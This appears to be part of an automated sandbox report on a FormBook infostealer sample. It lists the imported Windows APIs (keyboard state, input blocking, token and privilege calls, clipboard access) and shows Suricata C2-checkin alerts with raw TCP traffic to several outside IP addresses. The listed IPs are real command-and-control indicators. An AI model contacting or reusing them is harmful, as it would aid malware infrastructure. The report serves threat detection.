                                                                                          USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                          GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                          SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                          OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                                          Possible Origin

                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishGreat Britain

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-12-19T07:50:35.888894+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549740154.215.72.11080TCP
                                                                                          2024-12-19T07:51:09.555891+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549819116.50.37.24480TCP
                                                                                          2024-12-19T07:52:32.960227+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54987785.159.66.9380TCP
                                                                                          2024-12-19T07:52:47.659862+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54998891.195.240.9480TCP
                                                                                          2024-12-19T07:53:11.238787+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999266.29.149.4680TCP
                                                                                          2024-12-19T07:53:26.602852+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549996195.110.124.13380TCP
                                                                                          2024-12-19T07:53:57.895694+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550000217.196.55.20280TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 19, 2024 07:50:34.217392921 CET4974080192.168.2.5154.215.72.110
                                                                                          Dec 19, 2024 07:50:34.337281942 CET8049740154.215.72.110192.168.2.5
                                                                                          Dec 19, 2024 07:50:34.338948965 CET4974080192.168.2.5154.215.72.110
                                                                                          Dec 19, 2024 07:50:34.341274977 CET4974080192.168.2.5154.215.72.110
                                                                                          Dec 19, 2024 07:50:34.460875988 CET8049740154.215.72.110192.168.2.5
                                                                                          Dec 19, 2024 07:50:35.888730049 CET8049740154.215.72.110192.168.2.5
                                                                                          Dec 19, 2024 07:50:35.888786077 CET8049740154.215.72.110192.168.2.5
                                                                                          Dec 19, 2024 07:50:35.888894081 CET4974080192.168.2.5154.215.72.110
                                                                                          Dec 19, 2024 07:50:35.892417908 CET4974080192.168.2.5154.215.72.110
                                                                                          Dec 19, 2024 07:50:36.013993025 CET8049740154.215.72.110192.168.2.5
                                                                                          Dec 19, 2024 07:50:59.897789955 CET4980080192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:00.017462015 CET8049800116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:00.017537117 CET4980080192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:00.020395994 CET4980080192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:00.140048027 CET8049800116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:01.524215937 CET4980080192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:01.531634092 CET8049800116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:01.531773090 CET8049800116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:01.531816959 CET4980080192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:01.531872034 CET4980080192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:01.643755913 CET8049800116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:01.646924973 CET4980080192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:02.610318899 CET4980680192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:02.729969025 CET8049806116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:02.730057001 CET4980680192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:02.732276917 CET4980680192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:02.851816893 CET8049806116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:04.231998920 CET8049806116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:04.232059002 CET8049806116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:04.232198000 CET4980680192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:04.242975950 CET4980680192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:05.262372971 CET4981280192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:05.381961107 CET8049812116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:05.382088900 CET4981280192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:05.384725094 CET4981280192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:05.504235029 CET8049812116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:05.504322052 CET8049812116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:06.890149117 CET8049812116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:06.890203953 CET8049812116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:06.890256882 CET4981280192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:06.899158001 CET4981280192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:07.917306900 CET4981980192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:08.037133932 CET8049819116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:08.037256956 CET4981980192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:08.038743973 CET4981980192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:08.158267021 CET8049819116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:09.555674076 CET8049819116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:09.555740118 CET8049819116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:09.555891037 CET4981980192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:09.558384895 CET4981980192.168.2.5116.50.37.244
                                                                                          Dec 19, 2024 07:51:09.677963018 CET8049819116.50.37.244192.168.2.5
                                                                                          Dec 19, 2024 07:51:23.534882069 CET4985580192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:23.654634953 CET804985585.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:23.654927969 CET4985580192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:23.667551041 CET4985580192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:23.787239075 CET804985585.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:25.180584908 CET4985580192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:25.300689936 CET804985585.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:25.300762892 CET4985580192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:26.199851990 CET4986480192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:26.319534063 CET804986485.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:26.319621086 CET4986480192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:26.321504116 CET4986480192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:26.441028118 CET804986485.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:27.836663008 CET4986480192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:27.956583023 CET804986485.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:27.956711054 CET4986480192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:28.865354061 CET4987080192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:28.984965086 CET804987085.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:28.985039949 CET4987080192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:28.988245010 CET4987080192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:29.108010054 CET804987085.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:29.108035088 CET804987085.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:30.493175030 CET4987080192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:30.613472939 CET804987085.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:30.613564014 CET4987080192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:31.513501883 CET4987780192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:31.633173943 CET804987785.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:51:31.633248091 CET4987780192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:31.635165930 CET4987780192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:51:31.754745007 CET804987785.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:52:32.959995985 CET804987785.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:52:32.960133076 CET804987785.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:52:32.960227013 CET4987780192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:52:32.963148117 CET4987780192.168.2.585.159.66.93
                                                                                          Dec 19, 2024 07:52:33.082586050 CET804987785.159.66.93192.168.2.5
                                                                                          Dec 19, 2024 07:52:38.266813040 CET4998580192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:38.386357069 CET804998591.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:38.386593103 CET4998580192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:38.389144897 CET4998580192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:38.508610010 CET804998591.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:39.663331032 CET804998591.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:39.663376093 CET804998591.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:39.663494110 CET4998580192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:39.899411917 CET4998580192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:40.919177055 CET4998680192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:41.038856983 CET804998691.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:41.038944960 CET4998680192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:41.041213036 CET4998680192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:41.160806894 CET804998691.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:42.316906929 CET804998691.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:42.317409992 CET804998691.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:42.317465067 CET4998680192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:42.555305958 CET4998680192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:43.574702978 CET4998780192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:43.694307089 CET804998791.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:43.694415092 CET4998780192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:43.697117090 CET4998780192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:43.816837072 CET804998791.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:43.816926003 CET804998791.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:44.972100973 CET804998791.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:44.972208977 CET804998791.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:44.972304106 CET4998780192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:45.211536884 CET4998780192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:46.233239889 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:46.352739096 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:46.353096962 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:46.354913950 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:46.474356890 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659691095 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659706116 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659785032 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659822941 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659835100 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659862041 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.659895897 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659909010 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659919977 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659919024 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.659931898 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.659944057 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.659990072 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.660079002 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.660129070 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.779443979 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.779495955 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.779608965 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.851978064 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.852091074 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.852196932 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.856194019 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.856282949 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.856379032 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.864695072 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.864835024 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.864938974 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.872924089 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.873030901 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.873130083 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.881345034 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:52:47.881472111 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:47.884533882 CET4998880192.168.2.591.195.240.94
                                                                                          Dec 19, 2024 07:52:48.004040003 CET804998891.195.240.94192.168.2.5
                                                                                          Dec 19, 2024 07:53:01.712308884 CET4998980192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:01.831952095 CET804998966.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:01.832292080 CET4998980192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:01.863102913 CET4998980192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:01.982615948 CET804998966.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:03.071779966 CET804998966.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:03.071840048 CET804998966.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:03.071968079 CET4998980192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:03.367806911 CET4998980192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:04.386718035 CET4999080192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:04.506233931 CET804999066.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:04.506351948 CET4999080192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:04.508168936 CET4999080192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:04.627672911 CET804999066.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:05.739797115 CET804999066.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:05.739833117 CET804999066.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:05.739892960 CET4999080192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:06.024040937 CET4999080192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:07.043262005 CET4999180192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:07.364058971 CET804999166.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:07.364216089 CET4999180192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:07.366470098 CET4999180192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:07.485966921 CET804999166.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:07.486093044 CET804999166.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:08.604063034 CET804999166.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:08.604119062 CET804999166.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:08.604264021 CET4999180192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:08.869339943 CET4999180192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:09.887965918 CET4999280192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:10.007601976 CET804999266.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:10.007684946 CET4999280192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:10.012969017 CET4999280192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:10.132508039 CET804999266.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:11.238378048 CET804999266.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:11.238600016 CET804999266.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:11.238786936 CET4999280192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:11.241561890 CET4999280192.168.2.566.29.149.46
                                                                                          Dec 19, 2024 07:53:11.361007929 CET804999266.29.149.46192.168.2.5
                                                                                          Dec 19, 2024 07:53:17.124769926 CET4999380192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:17.244211912 CET8049993195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:17.244313955 CET4999380192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:17.246478081 CET4999380192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:17.368755102 CET8049993195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:18.555402994 CET8049993195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:18.556140900 CET8049993195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:18.556256056 CET4999380192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:18.760838032 CET4999380192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:19.784804106 CET4999480192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:19.904459000 CET8049994195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:19.904625893 CET4999480192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:19.906855106 CET4999480192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:20.026453018 CET8049994195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:21.215508938 CET8049994195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:21.215924025 CET8049994195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:21.215981960 CET4999480192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:21.414618969 CET4999480192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:22.511920929 CET4999580192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:22.631469011 CET8049995195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:22.631592035 CET4999580192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:22.633655071 CET4999580192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:22.757937908 CET8049995195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:22.760829926 CET8049995195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:24.054831982 CET8049995195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:24.055115938 CET8049995195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:24.055203915 CET4999580192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:24.149038076 CET4999580192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:25.172213078 CET4999680192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:25.292090893 CET8049996195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:25.292300940 CET4999680192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:25.294100046 CET4999680192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:25.413781881 CET8049996195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:26.602058887 CET8049996195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:26.602190971 CET8049996195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:26.602852106 CET4999680192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:26.606738091 CET4999680192.168.2.5195.110.124.133
                                                                                          Dec 19, 2024 07:53:26.726401091 CET8049996195.110.124.133192.168.2.5
                                                                                          Dec 19, 2024 07:53:48.614936113 CET4999780192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:48.734600067 CET8049997217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:48.734714031 CET4999780192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:48.739106894 CET4999780192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:48.858642101 CET8049997217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:49.937742949 CET8049997217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:49.937835932 CET8049997217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:49.938091040 CET4999780192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:50.242738962 CET4999780192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:51.262820959 CET4999880192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:51.382708073 CET8049998217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:51.382879972 CET4999880192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:51.385862112 CET4999880192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:51.505497932 CET8049998217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:52.582767010 CET8049998217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:52.583105087 CET8049998217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:52.583164930 CET4999880192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:52.898984909 CET4999880192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:53.917431116 CET4999980192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:54.036931992 CET8049999217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:54.037066936 CET4999980192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:54.038973093 CET4999980192.168.2.5217.196.55.202
                                                                                          Dec 19, 2024 07:53:54.158508062 CET8049999217.196.55.202192.168.2.5
                                                                                          Dec 19, 2024 07:53:54.158576012 CET8049999217.196.55.202192.168.2.5
